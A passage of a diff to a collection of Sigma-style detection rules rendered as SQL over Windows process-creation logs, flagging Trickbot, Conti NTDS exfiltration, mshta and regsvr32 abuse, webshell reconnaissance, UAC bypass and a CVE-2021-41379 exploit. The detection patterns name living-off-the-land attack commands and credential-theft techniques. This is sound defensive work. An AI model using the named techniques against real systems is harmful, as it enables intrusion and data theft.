LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": 
"proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": "Detects execution of javascript code 
using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects a suspicious parent of 
csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the 
\"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + 
"attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR 
OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' 
ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE 
'%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' 
ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program 
Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": 
"proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE 
